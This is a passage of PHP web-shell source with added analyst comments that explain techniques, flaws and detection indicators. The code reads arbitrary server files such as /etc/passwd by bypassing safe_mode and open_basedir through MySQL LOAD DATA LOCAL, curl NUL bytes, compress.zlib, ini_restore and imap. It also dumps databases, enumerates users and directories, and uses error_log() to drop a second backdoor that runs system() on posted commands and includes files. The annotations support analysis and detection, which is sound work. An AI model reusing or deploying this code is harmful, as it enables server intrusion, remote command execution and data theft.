 pack('v', sizeof($this -> ctrl_dir)) .
 pack('V', strlen($ctrldir)) .
 pack('V', strlen($data)) .
 "\x00\x00";
 }
 }
632
 // Database exfiltration helper: emits DROP/CREATE TABLE plus one INSERT
 // per row for $table, to $fp if given or to the response otherwise.
 // Assumes an open mysql_*() connection (ext/mysql, removed in PHP 7);
 // $table is interpolated into SQL unescaped. Not called in this chunk.
 function sqldumptable($table, $fp=0) {
 $tabledump = "DROP TABLE IF EXISTS $table;\n";
 $tabledump .= "CREATE TABLE $table (\n";

 $firstfield=1;

 // Column definitions from SHOW FIELDS.
 $fields = mysql_query("SHOW FIELDS FROM $table");
 while ($field = mysql_fetch_array($fields)) {
 if (!$firstfield) {
 $tabledump .= ",\n";
 } else {
 $firstfield=0;
 }
 $tabledump .= " $field[Field] $field[Type]";
 if (!empty($field["Default"])) {
 $tabledump .= " DEFAULT '$field[Default]'";
 }
 if ($field['Null'] != "YES") {
 $tabledump .= " NOT NULL";
 }
 if ($field['Extra'] != "") {
 $tabledump .= " $field[Extra]";
 }
 }
 mysql_free_result($fields);

 // Index definitions from SHOW KEYS. $index is never initialised; the
 // resulting notice is masked by error_reporting(7).
 $keys = mysql_query("SHOW KEYS FROM $table");
 while ($key = mysql_fetch_array($keys)) {
 $kname=$key['Key_name'];
 if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
 $kname="UNIQUE|$kname";
 }
 if(!is_array($index[$kname])) {
 $index[$kname] = array();
 }
 $index[$kname][] = $key['Column_name'];
 }
 mysql_free_result($keys);

 // implode(array, glue) is the legacy argument order (rejected in PHP 8).
 while(list($kname, $columns) = @each($index)) {
 $tabledump .= ",\n";
 $colnames=implode($columns,",");

 if ($kname == "PRIMARY") {
 $tabledump .= " PRIMARY KEY ($colnames)";
 } else {
 if (substr($kname,0,6) == "UNIQUE") {
 $kname=substr($kname,7);
 }
 $tabledump .= " KEY $kname ($colnames)";
 }
 }

 $tabledump .= "\n);\n\n";
 if ($fp) {
 fwrite($fp,$tabledump);
 } else {
 echo $tabledump;
 }

 // Row data: NULL for unset columns, otherwise quoted with the
 // connection-unaware mysql_escape_string().
 $rows = mysql_query("SELECT * FROM $table");
 $numfields = mysql_num_fields($rows);
 while ($row = mysql_fetch_array($rows)) {
 $tabledump = "INSERT INTO $table VALUES(";

 $fieldcounter=-1;
 $firstfield=1;
 while (++$fieldcounter<$numfields) {
 if (!$firstfield) {
 $tabledump.=", ";
 } else {
 $firstfield=0;
 }

 if (!isset($row[$fieldcounter])) {
 $tabledump .= "NULL";
 } else {
 $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
 }
 }

 $tabledump .= ");\n";

 if ($fp) {
 fwrite($fp,$tabledump);
 } else {
 echo $tabledump;
 }
 }
 mysql_free_result($rows);
 }
724
 // HTML table/form builder used by the UI. Array options are accessed with
 // bare-word keys ($arg[enctype] etc.): undefined-constant notices under
 // PHP 5/7 (hidden by error_reporting(7)), a fatal error under PHP 8.
 // Nothing in here escapes its inputs.
 class FORMS {
 function tableheader() {
 echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
 }

 // Emits a <form> wrapping one table row; keys: action (default ''),
 // method (default POST), enctype, content (raw HTML).
 function headerform($arg=array()) {
 global $dir;
 if ($arg[enctype]){
 $enctype="enctype=\"$arg[enctype]\"";
 } else {
 $enctype="";
 }
 if (!isset($arg[method])) {
 $arg[method] = "POST";
 }
 if (!isset($arg[action])) {
 $arg[action] = '';
 }
 echo " <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
 echo " <tr>\n";
 echo " <td>".$arg[content]."</td>\n";
 echo " </tr>\n";
 echo " </form>\n";
 }

 // Title row with a back-link to the current $dir. Not called in this chunk.
 function tdheader($title) {
 global $dir;
 echo " <tr class=\"firstalt\">\n";
 echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·mohajer</a>]</b></td>\n";
 echo " </tr>\n";
 }

 // One <tr><td> with raw $content; $bgcolor '1'/'2' select the alt classes,
 // any other value is used as the class name directly.
 function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
 if ($bgcolor=='2') {
 $css="secondalt";
 } elseif ($bgcolor=='1') {
 $css="firstalt";
 } else {
 $css=$bgcolor;
 }
 $height = empty($height) ? "" : " height=".$height;
 $colspan = empty($colspan) ? "" : " colspan=".$colspan;
 echo " <tr class=\"".$css."\">\n";
 echo " <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
 echo " </tr>\n";
 }

 function tablefooter() {
 echo "</table>\n";
 }

 // Opens a POST form with a title row; the link text is GBK mojibake
 // (appears to mean "back"). Not called in this chunk.
 function formheader($action='',$title,$target='') {
 global $dir;
 $target = empty($target) ? "" : " target=\"".$target."\"";
 echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
 echo " <tr class=\"firstalt\">\n";
 echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·µ»Ø</a>]</b></td>\n";
 echo " </tr>\n";
 }

 // Unlike makeinput(), this echoes immediately instead of returning, so
 // callers that concatenate its result get an empty string.
 function makehidden($name,$value=''){
 echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
 }

 // Returns an <input> tag; $css 'input' adds class="input".
 function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
 $css = ($css == 'input') ? " class=\"input\"" : "";
 $input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
 return $input;
 }
 // Fixed <select name=plugin> whose only option is labelled
 // "cat /etc/passwd" — the trigger for the posix_getpwuid() enumerator.
 // All parameters are ignored.
 function makeid($name,$value='',$extra='',$type='select',$size='30',$css='input'){
 $css = ($css == 'input') ? " class=\"input\"" : "";
 $input = "<select name=plugin><option>cat /etc/passwd</option></select>";
 return $input;
 }
 // Fixed <select name=switch> (file/dir) for the imap reader. Parameters ignored.
 function makeimp($name,$value='',$extra='',$type='select',$size='30',$css='input'){
 $css = ($css == 'input') ? " class=\"input\"" : "";
 $input = "<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>";
 return $input;
 }
 // Returns a <textarea>; $content is not escaped. Not called in this chunk.
 function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
 $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
 return $textarea;
 }

 // Submit row + </form>, optionally closing the table. Not called in this chunk.
 function formfooter($over='',$height=''){
 $height = empty($height) ? "" : " height=\"".$height."\"";
 echo " <tr class=\"secondalt\">\n";
 echo " <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value='mohajer'></td>\n";
 echo " </tr>\n";
 echo " </form>\n";
 echo $end = empty($over) ? "" : "</table>\n";
 }

 // Returns a <select>; keys: name, option (key=>label), selected (scalar
 // or key=>1 map), multiple, size, css. $multiple/$size are undefined
 // (empty) unless multiple==1.
 function makeselect($arg = array()){
 if ($arg[multiple]==1) {
 $multiple = " multiple";
 if ($arg[size]>0) {
 $size = "size=$arg[size]";
 }
 }
 if ($arg[css]==0) {
 $css = "class=\"input\"";
 }
 $select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
 if (is_array($arg[option])) {
 foreach ($arg[option] AS $key=>$value) {
 if (!is_array($arg[selected])) {
 if ($arg[selected]==$key) {
 $select .= "<option value=\"$key\" selected>$value</option>\n";
 } else {
 $select .= "<option value=\"$key\">$value</option>\n";
 }

 } elseif (is_array($arg[selected])) {
 if ($arg[selected][$key]==1) {
 $select .= "<option value=\"$key\" selected>$value</option>\n";
 } else {
 $select .= "<option value=\"$key\">$value</option>\n";
 }
 }
 }
 }
 $select .= "</select>\n";
 return $select;
 }
 }
851
852
853
// "Exploit" panel: one form per safe_mode/open_basedir bypass handled
// below (SQL LOAD DATA, posix uid enumeration, curl NUL-byte, compress.zlib
// copy, ini_restore, imap) plus the error_log() file dropper. The bare word
// `Show` is an undefined constant (string 'Show' on PHP < 8). Default
// values — '/etc/passwd' and the drop name 'Mohajer22.php' — are useful
// indicators when hunting for this family.
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR</b></td></tr></table>','center','top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');


$tb->headerform(array('content'=>'<FONT COLOR=RED>read file SQL:</FONT><br>' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit')));
$tb->headerform(array('content'=>'<FONT COLOR=RED>read file id:</FONT><br>' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit')));
$tb->headerform(array('content'=>'<FONT COLOR=RED>read file CURL:</FONT><br>' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit')));
$tb->headerform(array('content'=>'<FONT COLOR=RED>read file copy:</FONT><br>' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit')));
$tb->headerform(array('content'=>'<FONT COLOR=RED>read file ini_restore:</FONT><br>' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit')));
$tb->headerform(array('content'=>'<FONT COLOR=RED>read file or dir with imap:</FONT><br>' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit')));
$tb->headerform(array('content'=>'<FONT COLOR=RED>Make file ERORR:</FONT><br>' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit')));
866
867
// read file SQL ( ) //
// File read through MySQL: LOAD DATA LOCAL INFILE makes the *client library
// inside the PHP process* read the file and ship it to the server, so PHP's
// open_basedir/safe_mode checks on the path never run; the content is then
// SELECTed back. Needs the hard-coded credentials above and local_infile
// enabled. The `die()` leaks the failing statement and mysql_error() to
// the attacker. $mysql_files_str/$mysql_files are unused.
// Detection: MySQL general/audit log entries `CREATE TEMPORARY TABLE
// A<unixtime> (a LONGBLOB)` and `LOAD DATA LOCAL INFILE ... TERMINATED BY
// '__THIS_NEVER_HAPPENS__'` from the web application's DB account.
if(empty($_POST['Mohajer22'])){
} else {
echo "read file SQL","<br>" ;
echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
$file=$_POST['Mohajer22'];


$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
$mysql_files = explode(':', $mysql_files_str);

// $file is interpolated into SQL unescaped (it is the attacker's own input).
$sql = array (
"USE $mdb",
'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

"SELECT a FROM $tbl LIMIT 1"
);
mysql_connect ($mhost, $muser, $mpass);

 foreach ($sql as $statement) {
 $q = mysql_query ($statement);

 if ($q == false) die (
 "FAILED: " . $statement . "\n" .
 "REASON: " . mysql_error () . "\n"
 );

 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

 echo htmlspecialchars($r[0]);
 mysql_free_result ($q);
 }
echo "</textarea>";
}
// ERORR //
// File dropper via error_log(): message_type 3 appends the message to the
// file named in POST 'ER' (default 'Mohajer22.php'), so a second backdoor
// is written without fopen()/fwrite()/file_put_contents(). The embedded
// payload is a compact shell of its own: upload via register_globals
// ($fileup/$fileup_name + exec("pwd")), command execution via
// system($_POST['m']), and include($_POST['cmd']) for local/remote file
// inclusion. Hunt for files containing "Exploit: error_log() By * TrYaG".
// The payload below is a runtime string and is left byte-for-byte as found.
if(empty($_POST['ER'])){
} else {
$ERORR=$_POST['ER'];
echo error_log("
<html>
<head>
<title> Exploit: error_log() By * TrYaG Team * </title>
<body bgcolor=\"#000000\">
<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
<tr>
<td><center><font size='6' color='#BBB516'> By TrYaG Team</font></center></td>
</tr>
</table>
<font color='#FF0000'>
</head>
<?
if(\$fileup == \"\"){
ECHO \" reade for up \";
}else{
\$path= exec(\"pwd\");
\$path .= \"/\$fileup_name\";
\$CopyFile = copy(\$fileup,\"\$path\");
if(\$CopyFile){
echo \" up ok \";
}else{
echo \" no up \";
}
}
if(empty(\$_POST['m'])){
} else {
\$m=\$_POST['m'];
echo system(\$m);
}
if(empty(\$_POST['cmd'])){
} else {
\$h= \$_POST['cmd'];
 print include(\$h) ;
}
?>
<form method='POST' enctype='multipart/form-data' >
<input type='file' name='fileup' size='20'>
<input type='submit' value=' up '>
</form>
<form method='POST' >
<input type='cmd' name='cmd' size='20'>
<input type='submit' value=' open (shill.txt) '>
</form>
<form method='POST' enctype='multipart/form-data' >
<input type='text' name='m' size='20'>
<input type='submit' value=' run '>
<input type='reset' value=' reset '>
</form>
", 3,$ERORR);
}
961
// id //
// Reconstructs /etc/passwd without opening it: posix_getpwuid() for uids
// 0..59999 (works under open_basedir, since no file path is involved;
// blocked only by disable_functions / missing ext/posix). each() was
// removed in PHP 8.
// The trailing `break;` is outside any loop: on PHP 7+ that is a compile-
// time error that stops this whole file from running, on PHP 5 it appears
// to be a runtime fatal after the output was already sent — confirm on
// the target interpreter before concluding the sample was ever functional.
if ($_POST['plugin'] ){
echo "read file id" ,"<br>";
echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";



 for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
 $ara = posix_getpwuid($uid);
 if (!empty($ara)) {
 while (list ($key, $val) = each($ara)){
 print "$val:";
 }
 print "\n";
 }
 }
 echo "</textarea>";
 break;


 }
983
984
// CURL // -- file read through libcurl's file:// handler using an embedded NUL byte.
// Trigger: non-empty POST field `curl` ($m), the path to read.
// The URL is  file:///<m>\0/../../../../.../<__FILE__> . The part after the NUL walks
// back to this script (a path the shell is always allowed to touch), while libcurl works
// on C strings and stops at the NUL, so what it actually opens is <m>. This targets a
// historical mismatch between PHP's safe_mode/open_basedir check on the full PHP string
// and libcurl's view of it; it has long been fixed and current PHP rejects NUL bytes in
// the URL outright.
// Side effects: CURLOPT_RETURNTRANSFER is not set, so curl_exec() writes the body straight
// to the response and returns true. It is called twice, so the file is printed twice,
// followed by var_dump()'s "bool(true)". Nothing is escaped (a "</textarea>" in the file
// closes the box) and the handle is never curl_close()d.
if(empty($_POST['curl'])){

} else {
echo "read file CURL","<br>" ;
echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
$m=$_POST['curl'];
$ch =
curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
echo "</textarea>";
}
998
// copy// -- file read through the compress.zlib:// stream wrapper.
// Trigger: non-empty POST field `copy` ($u1p), the path to read.
// copy("compress.zlib://<path>", $temp) reads <path> via the zlib wrapper (plain,
// uncompressed files pass through unchanged). In old PHP releases this wrapper skipped
// the safe_mode/open_basedir check that a direct fopen() performs -- that is the point
// of the detour; on current PHP it is subject to the same checks. The temporary copy is
// read back, HTML-escaped and printed, then removed.
// Artefacts / edge cases worth knowing when this is found on a host:
//  - tempnam("", "cx") has an empty directory argument, so the temp file lands in the
//    system temp dir under a name starting with "cx";
//  - on the failure branch the file created by tempnam() is NOT unlink()ed (only the
//    success branch removes it) and die() ends the script with the <textarea> unclosed;
//  - fread($zrodlo, filesize($temp)) passes length 0 for an empty source file, which
//    PHP 8 rejects with a ValueError.
$u1p="";
$tymczas="";
if(empty($_POST['copy'])){
} else {
echo "read file copy" ,"<br>";
echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
$u1p=$_POST['copy'];
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$u1p, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
echo "</textarea>";
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
}
1021
/// ini_restore // -- readfile() before and after resetting safe_mode / open_basedir.
// Trigger: non-empty POST field `M2` ($m), the path to read.
// Prints the current safe_mode and open_basedir values (no separator between them, so
// two empty values print nothing), tries readfile($m), then calls ini_restore() on both
// directives and tries again. This targets an old PHP bug in which ini_restore() reset a
// directive to the main php.ini value even when a stricter per-vhost / per-directory
// value was in force; it was patched in the PHP 5.2 timeframe and safe_mode itself was
// removed in 5.4, so on current PHP the second readfile() behaves exactly like the first.
// Both readfile() calls write the file body raw into the <textarea>; the return value
// stored in $s (bytes read, or false) is never used.
if(empty($_POST['M2'])){
} else {
echo "read file ini_restore","<br> ";
echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
$m=$_POST['M2'];
echo ini_get("safe_mode");
echo ini_get("open_basedir");
$s=readfile("$m");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
$s=readfile("$m");
echo "</textarea>";
}
1038
// imap // -- file read / directory listing through the c-client (IMAP) library.
// Driven by POST fields `string` and `switch` (both default to 0 when empty).
//  - switch=file: imap_open($string, "", "") is handed a local path instead of a
//    "{host}mailbox" spec; c-client treats it as a local mailbox file and imap_body(..,1)
//    returns its contents, echoed raw inside <pre> (itself inside the <textarea>).
//    c-client performs its own file I/O, independent of PHP's open_basedir/safe_mode,
//    which is why the shell bothers with it. imap_open() returning false is not checked,
//    so imap_body()/imap_close() are then called on false.
//  - switch=dir: opens /etc/passwd as the stream and calls imap_list() with "ref|pattern"
//    split out of `string` ("*" when no pattern is given); c-client resolves the
//    mailbox pattern against the local filesystem, so the result is a directory listing.
// Note on the dispatch: `$switch == "file"` is a loose comparison against the default 0.
// On PHP 7 and earlier 0 == "file" is true, so a request with `string` but no `switch`
// lands in file mode; on PHP 8 it matches neither branch.

$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string && $switch == "file") {
echo "read file imap" ,"<br>";
echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";

$stream = imap_open($string, "", "");

$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
echo "</textarea>";
} elseif ($string && $switch == "dir") {
echo "read dir imap","<br>" ;
echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";

$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]"."<p> </p>" ;
echo "</pre>";
imap_close($stream);
echo "</textarea>";
}
// Closes the table cell opened for the previous section. $tb is a layout helper object
// defined earlier in the file (outside this view); tdbody() appears to emit its argument.
$tb->tdbody ("</td></tr></table>");
// open dir // -- directory walker that buckets subdirectories by exact permission bits.
// Form: POST field `m`, default "./" (the form's action='$REQUEST_URI' relies on
// register_globals; on PHP >= 5.4 it is an empty string, which still posts back here).
// When `m` is set, $path = $m is opened with opendir() unvalidated -- any directory the
// PHP user can read. $spath is never used; $_POST['method'] is read into $method and
// never used either.
// Eight copy-pasted passes follow. Each re-opens and re-reads the directory and prints
// the entries (including "." and "..") that are directories whose low four octal digits
// of fileperms() are exactly 0777, 0755, 0644, 0750, 0604, 0705, 0606 or 0703. Because
// the comparison is exact, modes such as 0775, 0771 or 1777 (sticky) never show up in
// any bucket. file_exists('.*') tests a literal file named ".*", not a glob, so it is
// always false and the inner guard is dead: every matching directory is collected.
// Only the first pass closedir()s its handle; the other seven leak until script end.
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: Open dir </b></td></tr></table>','center','top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');

if(empty($_POST['m'])){
echo "<div><FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
<table id=tb><tr><td><FONT COLOR=\"RED\">path dir</FONT>
<INPUT type='text' name='m' size=70 value='./'>
<INPUT type='submit' value='show' id=input></td></tr></table></form></div>";

} else {
$m=$_POST['m'];
$spath = $m ;
$path = $m ;




 $method = intval(trim($_POST['method']));

 // pass 1: exact mode 0777 (the only pass that closes its handle)
 $handle = opendir($path);

 $_folders = array();

 $i = 0;

 while (false !== ($file = readdir($handle)))
 {
 $full_path = "$path/$file";
 $perms = substr(sprintf('%o', fileperms($full_path)), -4);

 if ((is_dir($full_path)) && ($perms == '0777'))
 {
 if (!file_exists('.*')) {

 $_folders[$i] = $file;

 $i++;
 }
 }
 }


 closedir($handle);
 clearstatcache();



 echo '<strong><FONT COLOR=#00FF00>The folders is 777 :</strong><br />';

 foreach ($_folders as $folder)
 {
 echo $folder.'<br />';
 }
//////////
// pass 2: exact mode 0755
$handle = opendir($path);

 $_folders = array();

 $i = 0;

 while (false !== ($file1 = readdir($handle)))
 {
 $full_path = "$path/$file1";
 $perms = substr(sprintf('%o', fileperms($full_path)), -4);

 if ((is_dir($full_path)) && ($perms == '0755'))
 {
 if (!file_exists('.*')) {

 $_folders[$i] = $file1;

 $i++;
 }
 }
 }


 clearstatcache();



 echo '</FONT><strong><FONT COLOR=#FF9900>The folders is 755 :</strong><br />';

 foreach ($_folders as $folder)
 {
 echo $folder.'<br />';
 }
//////////
// pass 3: exact mode 0644
$handle = opendir($path);

 $_folders = array();

 $i = 0;

 while (false !== ($file1 = readdir($handle)))
 {
 $full_path = "$path/$file1";
 $perms = substr(sprintf('%o', fileperms($full_path)), -4);

 if ((is_dir($full_path)) && ($perms == '0644'))
 {
 if (!file_exists('.*')) {

 $_folders[$i] = $file1;

 $i++;
 }
 }
 }


 clearstatcache();



 echo '</FONT><strong><FONT COLOR=#CC9999>The folders is 644 :</strong><br />';

 foreach ($_folders as $folder)
 {
 echo $folder.'<br />';
 }
//////////
// pass 4: exact mode 0750
$handle = opendir($path);

 $_folders = array();

 $i = 0;

 while (false !== ($file1 = readdir($handle)))
 {
 $full_path = "$path/$file1";
 $perms = substr(sprintf('%o', fileperms($full_path)), -4);

 if ((is_dir($full_path)) && ($perms == '0750'))
 {
 if (!file_exists('.*')) {

 $_folders[$i] = $file1;

 $i++;
 }
 }
 }


 clearstatcache();



 echo '</FONT><strong><FONT COLOR=#9999CC>The folders is 750 :</strong><br />';

 foreach ($_folders as $folder)
 {
 echo $folder.'<br />';
 }
//////////
// pass 5: exact mode 0604
$handle = opendir($path);

 $_folders = array();

 $i = 0;

 while (false !== ($file1 = readdir($handle)))
 {
 $full_path = "$path/$file1";
 $perms = substr(sprintf('%o', fileperms($full_path)), -4);

 if ((is_dir($full_path)) && ($perms == '0604'))
 {
 if (!file_exists('.*')) {

 $_folders[$i] = $file1;

 $i++;
 }
 }
 }


 clearstatcache();



 echo '</FONT><strong><FONT COLOR=#669999>The folders is 604 :</strong><br />';

 foreach ($_folders as $folder)
 {
 echo $folder.'<br />';
 }
//////////
// pass 6: exact mode 0705
$handle = opendir($path);

 $_folders = array();

 $i = 0;

 while (false !== ($file1 = readdir($handle)))
 {
 $full_path = "$path/$file1";
 $perms = substr(sprintf('%o', fileperms($full_path)), -4);

 if ((is_dir($full_path)) && ($perms == '0705'))
 {
 if (!file_exists('.*')) {

 $_folders[$i] = $file1;

 $i++;
 }
 }
 }


 clearstatcache();



 echo '</FONT><strong><FONT COLOR=#336699>The folders is 705 :</strong><br />';

 foreach ($_folders as $folder)
 {
 echo $folder.'<br />';
 }
//////////
// pass 7: exact mode 0606
$handle = opendir($path);

 $_folders = array();

 $i = 0;

 while (false !== ($file1 = readdir($handle)))
 {
 $full_path = "$path/$file1";
 $perms = substr(sprintf('%o', fileperms($full_path)), -4);

 if ((is_dir($full_path)) && ($perms == '0606'))
 {
 if (!file_exists('.*')) {

 $_folders[$i] = $file1;

 $i++;
 }
 }
 }


 clearstatcache();



 echo '</FONT><strong><FONT COLOR=#996666>The folders is 606 :</strong><br />';

 foreach ($_folders as $folder)
 {
 echo $folder.'<br />';
 }
//////////
// pass 8: exact mode 0703
$handle = opendir($path);

 $_folders = array();

 $i = 0;

 while (false !== ($file1 = readdir($handle)))
 {
 $full_path = "$path/$file1";
 $perms = substr(sprintf('%o', fileperms($full_path)), -4);

 if ((is_dir($full_path)) && ($perms == '0703'))
 {
 if (!file_exists('.*')) {

 $_folders[$i] = $file1;

 $i++;
 }
 }
 }


 clearstatcache();



 echo '</FONT><strong><FONT COLOR=#3333FF>The folders is 703 :</strong><br />';

 foreach ($_folders as $folder)
 {
 echo $folder.'<br />';
 }



 }
 // Final, unconditional pass: lists every entry of $path (files and directories, "."
 // and ".." included) and then prints the count in $i. $perms is computed but unused.
 // Unlike the passes above this is NOT inside the `else` branch, so it runs on every
 // request. Within this view $path is only assigned when POST `m` is set; on a plain GET
 // it is undefined, opendir() fails with a warning and readdir() is handed false (a
 // warning on PHP 7, a TypeError on PHP 8). The handle is never closed.
 $handle = opendir($path);

 $_folders = array();

 $i = 0;

 while (false !== ($file1 = readdir($handle)))
 {
 $full_path = "$path/$file1";
 $perms = substr(sprintf('%o', fileperms($full_path)), -4);




 $_folders[$i] = $file1;

 $i++;


 }



 clearstatcache();



 echo '</FONT><strong><FONT COLOR=#FFFF00>The folders and file all :</strong><br />';

 foreach ($_folders as $folder)
 {
 echo $folder.'<br />';
 }

 echo '</FONT><strong><FONT COLOR=#FF0000>The total : </strong>'.$i.'</FONT><br />';
// safe-mode section -- enumerates directory names out of safe_mode warning messages.
// Shows a form for `root` (default "/"; the previous value is reflected into the value=
// attribute unescaped), sets error_reporting(E_WARNING) + display_errors=1 for the rest
// of the script, then die()s unless safe_mode is on. safe_mode was removed in PHP 5.4, so
// on any current PHP the page ends at that die() and nothing below it runs. The die() is
// a bare single-statement if, so the `function eh` declared further down is still
// hoisted at compile time and set_error_handler("eh") resolves.
// Technique (safe_mode era): glob("<prefix>*") raised, for every match owned by another
// uid, a warning reading "SAFE MODE Restriction in effect ... is not allowed to access
// <path> owned by uid N". eh() captures <path> into the global $D. The four nested loops
// brute-force 1- to 4-character name prefixes over $chars (66 characters; "0" appears
// twice) and only descend a level when the previous glob() grew $D -- i.e. when a name
// with that prefix exists. Worst case is 66^4 synchronous glob() calls, which is slow and
// very noisy in the error log. $D is de-duplicated and dumped one path per line.
$tb->tdbody ("</td></tr></table>");
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: break fucking safe-mode </b></td></tr></table>','center','top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');


 error_reporting(E_WARNING);
 ini_set("display_errors", 1);

 echo "<head><title>".getcwd()."</title></head>";

 echo "<form method=POST>";
 echo "<div style='float: left'><FONT COLOR=\"RED\">Root directory: </FONT><input type=text name=root value='{$_POST['root']}'></div>";
 echo "<input type=submit value='--»'></form>";



 // break fucking safe-mode !

 $root = "/";

 if($_POST['root']) $root = $_POST['root'];

 // Everything after this line is dead on PHP >= 5.4 (ini_get('safe_mode') is false).
 if (!ini_get('safe_mode')) die("<font size=-2 face=verdana color='#CC0000'>Safe-mode is OFF.</font>");
echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
 $c = 0; $D = array();
 set_error_handler("eh");

 $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";

 // $D[count($D)-1] is read before and after each glob(); a changed last element means
 // the handler captured a new path for this prefix, so the next level is explored.
 for($i=0; $i < strlen($chars); $i++){
 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";

 $prevD = $D[count($D)-1];
 glob($path."*");

 if($D[count($D)-1] != $prevD){

 for($j=0; $j < strlen($chars); $j++){

 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";

 $prevD2 = $D[count($D)-1];
 glob($path."*");

 if($D[count($D)-1] != $prevD2){


 for($p=0; $p < strlen($chars); $p++){

 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";

 $prevD3 = $D[count($D)-1];
 glob($path."*");

 if($D[count($D)-1] != $prevD3){


 for($r=0; $r < strlen($chars); $r++){

 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
 glob($path."*");

 }

 }

 }

 }

 }

 }

 }

 $D = array_unique($D);


 foreach($D as $item) echo "{$item}\n";
1495
1496
1497
1498
1499
 // Error handler installed by set_error_handler("eh") above.
 // Ignores everything except the safe_mode warning of the form "SAFE MODE Restriction in
 // effect ... whose uid is X is not allowed to access <path> owned by uid Y"; for that
 // one it appends the <path> capture ($o[2]) to the global $D list and advances the
 // global counter $c. $i is declared global but not used. The handler returns null
 // (not false), so PHP's built-in handler does not run and every warning is swallowed
 // rather than displayed, regardless of display_errors.
 function eh($errno, $errstr, $errfile, $errline){

 global $D, $c, $i;
 preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
 if($o){ $D[$c] = $o[2]; $c++;}

 }
